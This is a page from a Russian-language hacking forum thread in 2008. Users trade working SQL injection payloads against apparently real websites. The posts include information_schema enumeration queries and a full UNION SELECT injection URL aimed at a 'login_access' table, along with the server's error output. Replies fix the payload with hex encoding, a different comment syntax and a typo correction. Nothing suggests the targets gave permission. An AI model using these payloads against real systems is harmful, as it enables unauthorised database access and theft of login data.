HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4251  
Старый 22.12.2008, 18:25
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами: 9999746

Репутация: 1318


По умолчанию

таблицы user нету в той базе, в которой работает сайт.
 
Ответить с цитированием

  #4252  
Старый 22.12.2008, 18:26
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами: 9681386

Репутация: 2145


По умолчанию

нет такой таблицы.
сначала попробуй вытащить названия всех таблиц через information_schema
 
Ответить с цитированием

  #4253  
Старый 22.12.2008, 18:28
$p01nt
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
С нами: 9591697

Репутация: 96
По умолчанию

Через информатион.схема и вытащил!!!
Потом прочитал все columns и вот сейчас выдает это!!
Если кому-то не лень, стукните в аську 24-три9-24 плиз
 
Ответить с цитированием

  #4254  
Старый 22.12.2008, 18:36
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами: 10660753

Репутация: 676


По умолчанию

посмотри базу в которой таблица лежит...
select table_schema from information_schema.columns where table_name='users'
select concat_ws(0x3a,table_schema,table_name,column_name ) from information_schema.columns
 
Ответить с цитированием

Oracle
  #4255  
Старый 22.12.2008, 23:00
zenon2
Новичок
Регистрация: 25.10.2006
Сообщений: 10
С нами: 10285880

Репутация: 1
По умолчанию Oracle

Может кто подскажет какая есть альтернатива функции LIMIT в Oracle. Хотелось просмотреть название таблиц и колонок.
 
Ответить с цитированием

  #4256  
Старый 22.12.2008, 23:40
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
С нами: 9764446

Репутация: 123
По умолчанию

Хочу вывести название колонок, но при
Цитата:
/video.php?id=-9999+union+select+1,2,3,4,5,column_name,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+fr om+IINFORMATION_SCHEMA.COLUMNS+where+table_name='l ogin_access'--
Выводит
Цитата:
query failed:SELECT * FROM podcast WHERE id=-9999 union select 1,2,3,4,5,column_name,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43 from IINFORMATION_SCHEMA.COLUMNS where table_name=login_access-- ORDER BY date DESC LIMIT 0,1
Пробовал
Цитата:
-9999+union+select+1,2,3,4,5,column_name,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+fr om+IINFORMATION_SCHEMA.COLUMNS+where+table_name=(0 x6c6f67696e5f616363657373)--
Выводит почти тоже самое
Цитата:
query failed:SELECT * FROM podcast WHERE id=-9999 union select 1,2,3,4,5,column_name,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43 from IINFORMATION_SCHEMA.COLUMNS where table_name=(0x6c6f67696e5f616363657373)-- ORDER BY date DESC LIMIT 0,1
Может я чего не так делаю или как нибудь по другому нужно. Хелп, плиз.
Версия 5.0.45-log
 
Ответить с цитированием

  #4257  
Старый 22.12.2008, 23:48
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Цитата:
Сообщение от zenon2  
Может кто подскажет какая есть альтернатива функции LIMIT в Oracle. Хотелось просмотреть название таблиц и колонок.
попробуй concat_all

2 hackmen:

скобки убери, когда хексишь, и "--" пишется в конце всех запросов и условий
 
Ответить с цитированием

  #4258  
Старый 22.12.2008, 23:49
desTiny
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
С нами: 10139366

Репутация: 1502


По умолчанию

вместо -- пиши /*
это тебе не мсскл

ну и кавычки ещё по-хорошему писать надо
__________________
Bedankt euch dafür bei euch selbst.

H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
 
Ответить с цитированием

  #4259  
Старый 22.12.2008, 23:51
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

hackmen, чтоза IINFORMATION_SCHEMA ?
 
Ответить с цитированием

  #4260  
Старый 23.12.2008, 04:43
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
С нами: 9764446

Репутация: 123
По умолчанию

Цитата:
Сообщение от freddi  
hackmen, чтоза IINFORMATION_SCHEMA ?
Вот черт =)
Спасиб!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.